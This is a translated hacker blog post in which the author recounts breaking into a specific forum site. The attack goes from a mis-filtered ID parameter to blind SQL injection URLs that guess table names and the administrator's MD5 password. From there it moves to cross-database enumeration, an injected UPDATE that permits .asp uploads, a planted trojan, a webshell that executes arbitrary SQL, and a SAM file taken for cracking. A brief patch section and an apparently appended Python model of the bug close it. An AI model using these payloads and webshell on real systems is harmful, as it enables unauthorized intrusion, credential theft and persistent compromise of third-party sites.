Cross-database query: exposing the value of any field in any table in any database.

xiaoxiao2021-03-06  40

1. Foreword:

Yesterday, while reading through some December articles, I had the idea of writing up a forum vulnerability I had found. I then noticed that the better-known forums had already been picked over by predecessors on the Internet. Just then a friend sent me a "modified Snowman Forum"; I discovered this vulnerability in it and used it to carry out the intrusion. If you have any questions, discuss them at www.cnwill.com.

2. How the vulnerability was discovered:

Scripts: I have always been quite interested in script vulnerabilities. It had been a long time since I last did an intrusion, because work at the company kept me busy. I found an official BBS site and tested it. First I opened my scanner and scanned the site. Open ports: 21, 80 and 1433, and that is all there is to work with. Any single hole would do me! FTP is Serv-U, which can be used later to elevate privileges, but so far I have no shell. 1433 is MSSQL, with its many well-known intrusion tricks. Since the Blaster worm I rarely see 135 open; SP4 is probably installed.

Well, let's try FTP: anonymous login is not enabled. I have been lucky before, but not this time; I did not get in. Sorry to disappoint everyone! Next, 1433: are there any weak passwords? I scanned and scanned! The result disappoints everyone, and me too! It is probably SP3, and the problem is that I have no overflow program for SQL Server SP3. Give up? Why give up, the story has only just started!

There are no vulnerabilities in the site's own scripts; the only thing on it is a forum, nothing else. I could find no vulnerability information about this forum, at least none I knew of; it may simply not be a popular one. Compared with Dvbbs (动网) it really is small fry. I found a place on his forum offering a free version for download. Port 1433 is open to the outside, so it is 90% likely that this forum uses an MSSQL database.

If I can find a SQL injection vulnerability, the odds are good. Download his free version! Open the ASP source code and look for vulnerabilities. I like to light a cigarette while doing this; I don't know why, it seems I have gotten used to the feeling. Hunting for vulnerabilities is inseparable from cigarettes; without them there is no inspiration. Digging through code for holes is really tedious.

Snowman Forum requirements: Windows NT host, Access or SQL Server 2000 database. Everything available on the web is the Access version. First download a fresh SF2.0 for Access, then search all the ASP code for parameters of the form **.asp?id=** and look at editPost.asp and similar files.

I read 13 ASP files without the slightest gain. But I was looking for a vulnerability, and giving up is not my style; I like a challenge. Just as I opened the next ASP file the phone rang: my girlfriend, telling me to go with her to the movies tonight. She said "Demonii III" is out; personally I prefer Andy Lau's "Fulltime Killer", which is still showing! So I quickly agreed: see her at 8 in the evening. Having put down the phone, I had two hours, so I went on analyzing the code. I found the statement that filters the parameter and looked at it: chksql strips single quotes from the submitted ID, and then isnumeric rejects the value if it is not a number. Wow, this obviously blocks the vulnerability, but the editpost.asp programmer made a mistake that almost made me laugh out loud: it is filtered, but the filter is applied to the wrong thing!

3. The principle of the vulnerability:

    err = false
    postid = chksql("postid")
    if not isnumeric(postidid) then   ' IsNumeric tests whether a value is a number and returns a Boolean
        ' ^^^^^^^^^^^^^^^^^^^^^^^^^ this is the statement that produces the vulnerability.
        ' With this check in place it should be safe: only a numeric postid could get through.
        ' But the problem is right here: IsNumeric is checking "postidid", while the variable
        ' actually used is "postid". So postid gets no filtering at all, and we can boldly
        ' query the administrator password out of the database.
        err = true
    else
        strSql = "select * from sf_post where postid=" & postid
        set rs2 = conn.execute(strSql)
        if rs2.bof or rs2.eof then
            err = true
        else
            posttitle = rs2("title")
            threadid = rs2("threadid")
            userid = rs2("userid")
            strSql = "select * from sf_thread where visible=1 and threadid=" & threadid
            set rs2 = conn.execute(strSql)
            if rs2.bof or rs2.eof then
                err = true
            else
                threadtitle = rs2("title")
                forumid = rs2("forumid")
                open = rs2("open")
            end if
        end if
    end if

editpost.asp and other files all contain this vulnerability: the parameter check is applied to the wrong variable, which is equivalent to no check at all. A small vulnerability, and I happened to catch it. Let's start. Off we go again!

4. Detailed intrusion process for the Access version:

http://cnwill.com/editpost.asp?postid=513 or 0<>(select count(*) from sf_user)
Tests whether the sf_user table exists.

http://cnwill.com/editpost.asp?postid=513 and 0<>(select count(*) from sf_user where username<>'')
Tests whether there is a username column.

http://cnwill.com/editpost.asp?postid=513 and 0<>(select count(*) from sf_user where password<>'')
Tests whether the sf_user table has a password column.

Query the administrator password:
http://cnwill.com/editpost.asp?postid=513 and exists(select min(userid) from sf_user where left(password,1)='c' and userid=1)
min(userid) is the smallest ID; max(userid), the largest ID, can be used instead. userid=1 is the administrator's ID number in the sf_user table. left() guesses the password column from the left, one character at a time:
http://cnwill.com/editpost.asp?postid=513 and exists(select min(userid) from sf_user where left(password,2)='cn' and userid=1)
and so on, character by character (when a guess is right, the page renders normally).

Guess the administrator username length:
http://cnwill.com/editpost.asp?postid=513 and exists(select min(userid) from sf_user where len(username)=8 and userid=1)

Guess the administrator password length:
http://cnwill.com/editpost.asp?postid=513 and exists(select min(userid) from sf_user where len(password)=16 and userid=1)
The password is stored as a 16-character MD5 hash.

Cracking the MD5 hash: put it on a fast "broiler" (a compromised machine) and let it run... Administrators in general pay no attention to password security; there is always an administrator whose password is very easy to guess.

5. Detailed intrusion process for the MSSQL version

(1) Given the scan results above, I believe the system administrator is certainly no fool, so xp_cmdshell has probably been deleted and the site's security may be relatively high; we can only work through this small vulnerability. Let's get going. Open IE and enter: http://www.cnwill.com/bbs/po.asp?pxid=523 and 1=1. The page returns normally, so the vulnerability really exists. What follows is where it got painful. In the downloaded Access database I had found the user table, and in it a field that distinguishes front-desk administrators. On his site I then found an administrator's ID number and tested it: http://www.cnwill.com/bbs/po.asp?pxid=523 and 0<>(select count(*) from xxx_user where username>0 and flag=4 and userid=1). IE returned an error: the xxx_user table could not be found. So the people running the official site are indeed no fools. It felt as if the background management path might also have been changed; I tested it, and sure enough it had. The intrusion route was completely sealed off. Plan A failed; on to plan B!

(2) Plan B is to use a cross-database query to brute-force his table names and then continue the injection. I lit a cigarette. I believed this time I would get his real table names, because I had succeeded before with cross-database table-name enumeration. In two minutes I had every database name on the server; I analyzed them and identified the database used by the BBS, then enumerated the table names in that database. It was a lot of work. Table names need single quotes, and the other side filters single quotes, so I used SQL encoding to replace the quotes. The first table name I got was xxx_yy_setsys. The database I downloaded has a table named xxx_setsys, so there is an extra "yy". If you had to guess, would you say he added "yy" to every table name? You would definitely test it, and so did I.
I changed the statement that had just tested the vulnerability, and it succeeded. This time I dumped the front-desk administrator's name in IE. Now the password: dumped it, MD5. Another MD5 hash. I don't like dumping passwords because it takes a long time, and this is the official site's administrator password, so I did not dare rely on social engineering to guess it. So I looked for another road.

(3) You should be very familiar with FSO. The forum supports file uploads, but when posting it checks the file extension. How do I get my ASP trojan onto it? Analyzing his ASP source: he uses a table to store the allowed upload extensions; if your file's extension is not in that table, you cannot upload it. So we only need to change the records in that table. By default the allowed extensions are jpg, gif, rar and zip. I picked the rar entry: we can change rar to asp. Using MSSQL's UPDATE statement I hit a problem: changing his record requires a single quote, and SQL encoding did not succeed this time. But I soon thought of another way: I would register a username called asp.

Then use a SELECT statement to fetch that username and write it into the table, no single quotes needed, ha! On registering, that username already existed; ok, I'll take a substring instead: I registered aspxasp, and that worked. I submitted the following statement:

http://www.cnwill.com/bbs/po.asp?pxid=523;update uploadfile set exefilename=substring((select user from xxx_yy_setsys where userid=74852),1,3) where ascii(substring(exefilename,1,1))=114--

No error, so it most likely succeeded. Ok, change the statement to dump his settings: my dear IE, I love you very much, haha, IE shows the word asp. That proves I succeeded. I can't be happy too early, because the story has only entered its development phase; I have to upload the ASP trojan quickly, and to avoid being noticed by the administrator I have to change the settings back at top speed. Everything went according to plan. I uploaded the trojan, then added an ASP file that directly executes any SQL statement:

    cmd = trim(Request("chou"))
    if cmd <> "" then
        conn.execute cmd
    end if

With this file I turned the settings back and deleted the account I had registered. At the same time I copied the trojan to a hidden place. Then I patched his forum: two characters deleted, since he was filtering the wrong parameter. Plan B succeeded. Ok, that was easy.

(4) View server information and try to elevate privileges to system administrator. Now that we have a webshell, let's first look at Serv-U local privilege escalation. Hey, no good: there is no write permission to change the configuration file. MSSQL has SP3 installed. So much for the services. Well, let's look at what programs he has installed. In the program directory, suddenly, one folder made my eyes light up, hehe! I found a pcAnywhere directory. Damn, 5631 is not open. It may have been installed earlier and the service stopped since. Never mind, let's see whether there is a CIF file! Searched for *.cif: only the one default file.
Nothing at all; a waste of effort. Still, I believe there will be a way to elevate. Let's put on a song to wake up the thinking! Open the music, "The heart is not very", and get into the rhythm! Light a cigarette and enjoy! Meanwhile I downloaded his SAM file and put it on my super-fast, invincible "meat machine" to crack the passwords. Time is approaching 8 o'clock; I have to go to the movies with my girlfriend! OK, let's leave it here. I shut down the computer, put on my coat: romance! Friends, see you next time! :)

6. The vulnerability patch: in editpost.asp and the other affected files, replace the check with

    if not isnumeric(postid)

and the vulnerability is patched.
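To make the defect and the patch concrete, here is an added Python model of the editpost.asp logic (not the forum's own code): chksql and IsNumeric are approximated, and in the buggy version the guard tests postidid, a variable that is never assigned, which VBScript treats as Empty and IsNumeric accepts, so the guard never rejects anything.

```python
import re
from typing import Optional

# Added model of the editpost.asp logic (not the forum's own code). chksql and
# IsNumeric are approximations of the VBScript functions, accurate for integer IDs.

def chksql(value: str) -> str:
    """Mimic chksql: strip single quotes from the submitted parameter."""
    return value.replace("'", "")

def is_numeric(value: str) -> bool:
    """Approximation of VBScript IsNumeric restricted to plain integers.
    The real IsNumeric also accepts forms such as '1e3', '&H10', ' 5.0 ' and Empty."""
    return re.fullmatch(r"\s*[-+]?\d+\s*", value) is not None

def build_query_buggy(params: dict) -> Optional[str]:
    """The vulnerable editpost.asp shape: the guard tests postidid, which is
    never assigned. In VBScript an unassigned variable is Empty and
    IsNumeric(Empty) is True, so the guard never fires."""
    postid = chksql(params.get("postid", ""))
    postidid_is_numeric = True          # IsNumeric(Empty) -> True
    if not postidid_is_numeric:
        return None                     # never reached
    return "select * from sf_post where postid=" + postid

def build_query_fixed(params: dict) -> Optional[str]:
    """The patched shape: the guard tests the variable that is actually used,
    and the value is normalised to an integer before it reaches the query."""
    postid = chksql(params.get("postid", ""))
    if not is_numeric(postid):
        return None
    return "select * from sf_post where postid=%d" % int(postid)

# Constructed sample inputs: a normal request and the page's table-probe payload.
NORMAL = {"postid": "513"}
PROBE = {"postid": "513 or 0<>(select count(*) from sf_user)"}

if __name__ == "__main__":
    print(build_query_buggy(NORMAL))   # select * from sf_post where postid=513
    print(build_query_buggy(PROBE))    # injected condition reaches the database
    print(build_query_fixed(PROBE))    # None: request rejected
```

The fixed version also rejects values that VBScript's IsNumeric would accept, such as "1e3", because the integer conversion is what actually bounds what reaches the query.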

Reprints must credit the original: https://www.9cbs.com/read-86023.html
